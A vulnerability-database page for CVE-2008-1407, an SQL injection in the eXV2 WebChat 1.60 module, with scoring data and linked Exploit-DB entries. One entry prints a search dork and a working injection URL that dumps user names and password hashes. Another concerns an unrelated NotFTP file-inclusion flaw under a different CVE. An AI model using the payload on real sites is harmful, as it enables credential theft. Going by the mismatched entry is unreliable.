CVE-2008-1407
Published 2008-03-20
CVE-2008-1407: SQL injection vulnerability in index.php in the WebChat 1.60 module for eXV2 allows remote attackers to execute arbitrary SQL commands via the roomid parameter.
Priority P3 (35) · medium · 6.8 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.91% (55.6th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| exv2 | exv2 | — | — |
No detection rules found.
Exploit-DB
NotFTP 1.3.1 - 'newlang' Local File Inclusion
exploitdb·2009-04-21
CVE-2009-1407 NotFTP 1.3.1 - 'newlang' Local File Inclusion
---
NotFTP 1.3.1 => Local file include
http://sourceforge.net/projects/notftp/
Author: Kacper
Email: [email protected]
Home: http://devilteam.pl/
DC++ Hub address: bluber-hub.no-ip.biz:2008
Vuln:
File config.php:
```php
#########################################################################
# This is where we decide what language to use. Don't mess with this
# either.
#########################################################################
if (isset($newlang))
{
    require_once("lib/lang/".$languages[$newlang]["file"]);
}
elseif (isset($_COOKIE["notftplang"]))
{
    require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]);
}
else
{
    require_once("lib/lang/".$languages[DEFAULTLANG]["file"]);
}
# NotFTP version. Changing this would be
```
Exploit-DB
eXV2 Module WebChat 1.60 - 'roomid' SQL Injection
exploitdb·2008-03-14
CVE-2008-1407 eXV2 Module WebChat 1.60 - 'roomid' SQL Injection
---
##########################################
#
# Powered by eXV2 WebChat 1.60 SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : [email protected]
#
###########################################
#
# DORKS 1 : allinurl :"modules/WebChat"
#
###########################################
EXPLOIT 1 :
modules/WebChat/index.php?roomid=-9999999/**/union/**/select/**/0,uname,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201
###########################################
WebChat 1.60
Submit date: 2006/6/13
Homepage: www.exv2.de
Version : 1.60
Downloads : 561
Filesize : 79.76 KB
Supported platforms : eXV2
#################################
No writeups or analysis indexed.
http://secunia.com/advisories/29390
http://www.securityfocus.com/bid/28256
https://exchange.xforce.ibmcloud.com/vulnerabilities/41213
https://www.exploit-db.com/exploits/5255
Published: 2008-03-20